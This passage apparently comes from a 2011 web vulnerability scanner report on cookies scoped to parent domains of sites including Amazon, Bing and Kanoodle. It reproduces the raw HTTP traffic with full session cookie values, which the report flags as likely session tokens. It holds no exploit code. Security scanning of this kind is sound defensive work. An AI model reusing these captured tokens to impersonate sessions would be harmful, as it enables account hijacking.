other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:27:29 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-cache Pragma: no-cache P3P: CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: session=1296350849|1296350849; path=/; domain=.mookie1.com Content-Length: 35 Content-Type: image/gif
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:52 GMT Server: Server x-amz-id-1: 10BYGVG84SJDT6NK5QPW p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: Q88q6IxskVrNIWayV7qw53kBxjzbTCVGq9rikqIi4h0WIkQdBAnBtxKB8IUJkYyC Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT Content-Length: 413393
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:33 GMT Server: Server x-amz-id-1: 04VBMFPBJXZ8J962J8W2 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT Content-Length: 386121
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:48 GMT Server: Server x-amz-id-1: 04T12HTYNC9C14B5HM4X p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: XeMb8ZphbyEceEV8uZ/rPWye3cxGU6y1x/oV8aO+RYhm6u/E/f5MILGVJEj9+KgY Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT Content-Length: 312688
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:20 GMT Server: Server x-amz-id-1: 0XKECKNR6H60A6C1P2PC p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT Content-Length: 400270
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:13 GMT Server: Server x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT Content-Length: 398788
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/deals/cheap-flights-to-the-caribbean.do HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/deals/last-minute-flight-deals.do HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/hotels HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.dailygrail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:32 GMT Server: lighttpd Content-Length: 63252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr"> <head> <meta http-eq ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.dooce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:52:34 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11 X-Powered-By: PHP/5.2.11 Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com Last-Modified: Sun, 30 Jan 2011 01:51:21 GMT ETag: "f0b5f444b53d8d069d3f3c230e6ce5fd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://burp/show/43 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:25 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 10678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999< ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ajax/search_spy_data.html HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:32 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 529
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ajax/search_spy_data_today.html HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data_today.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:32 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 765
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search_spy.html HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:31 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 14397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999< ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.popsci.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
